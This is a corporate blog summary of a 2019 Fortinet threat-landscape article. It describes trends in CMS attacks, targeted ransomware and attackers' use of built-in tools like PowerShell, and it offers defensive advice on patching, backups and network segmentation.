This is a summary of an article written for Canadian Security by Fortinet’s Global Security Strategist, Derek Manky. The entire article can be accessed here.
Fortinet regularly releases global Threat Landscape Reports, which take stock of billions of live threat events, collected from millions of devices and analyzed by our FortiGuard Labs team. At its core, the report is meant to answer the simple question of, “is it getting better or worse out there?” While the answer is complicated, here are a few trends that need to be monitored:
Personally identifiable information (PII) collected from social media sites is often used by cybercriminals for phishing and spearphishing attacks. But that is only part of the problem. The websites run by many organizations rely on content management systems (CMS) and related development frameworks that are also vulnerable.
While the dominant CMS system, WordPress, has been targeted for years, attacks have begun to move to lesser-known CMS systems. Attacks range from simply vandalizing a website and impacting a company’s brand and reputation, to stealing or compromising mailing lists and data from forums, media galleries, and online stores and shopping carts, to using a compromised website as a launching pad to attack internal network resources or infect visitors to the site.
Multiple ransomware attacks in recent months indicate it is increasingly being customized for high-value targets, often to provide the attacker with privileged access to the network. LockerGoga is an example of an attack conducted in multiple stages, the first being a thorough reconnaissance of the defenses in place at the sites being targeted. In one high impact attack, attackers were able to predetermine that obfuscation and evasion techniques were unnecessary as the malware would not be easily detected by existing defenses.
It’s critical that businesses take steps to protect against ransomware by ensuring consistent patching and backup priorities are maintained, including storing backups off-network, regularly testing them for malware, and dry runs of system restoration to ensure the process is rapid.
Living off the Land
Attackers are increasingly using tools pre-installed on targeted systems to carry out their activities. This is known as “living off the land,” and enables hackers to hide their attacks behind what appears to be normal, everyday processes, making them more challenging to identify. And because many of these tools include privileged access, they can also be harder to stop.
“PowerShell is arguably one of the most popular tools used by IT teams for many reasons. It comes pre-installed on Windows machines and can interact directly with the .NET Framework. It has also become quite popular among cybercriminals. We’ve tracked adversaries using PowerShell in campaigns to deploy numerous malware, including TrickBot and Emotet banking Trojans. PowerShell, of course, is not the only one. There are other popular utilities that enable attackers to escalate privileges, move laterally across an environment, and install malicious payloads on other systems.”
What You Can Do
Watch for attacks and expect them to come in waves. Cyberattacks initiated by different cybercriminals tend to occur in clusters. It is therefore critical that threat intelligence and response systems understand and focus on those systems and functions currently being targeted by cybercriminals.
Prioritize cyber hygiene. Zero day attacks are rare because they are difficult to develop. Instead, attackers target known vulnerabilities for which a patch is readily available, trusting that most companies are lax in their patching and updating protocols. You need to identify every connected asset on your network, immediately patch those with vulnerabilities, replace those that can no longer be updated, and segment those devices that can’t be easily patched.
“Finally, organizations need to step back and rethink their security—especially if they have been engaged in digital transformation efforts. The first step is to identify and then engineer out as many points of weakness as possible. This includes a proactive inventory of devices, granular access control and dynamic network segmentation. Next, develop a proactive and integrated security approach that provides consistent protection across your entire distributed environment. In this way, you can better defend you entire network environment—from IoT devices and the mobile edge, the network core, the new WAN edge and out to multi-cloud environments—at speed and scale.”
Cyber threats are unlikely to ever stop. Instead, that reality needs to be woven into every new infrastructure or technology initiative begun by your organization. This requires security to operate in an integrated and collaborative fashion take to keeping adversaries at bay.
This is a summary of an article written for Canadian Security entitled, New global threat report underscores importance of refreshing cyber hygiene, written by Fortinet’s Global Security Strategist, Derek Manky, and published on the Canadian Security website on May 30, 2019.
Read more about the latest cybersecurity threat trends and the evolving threat landscape in our latest Quarterly Threat Landscape Report.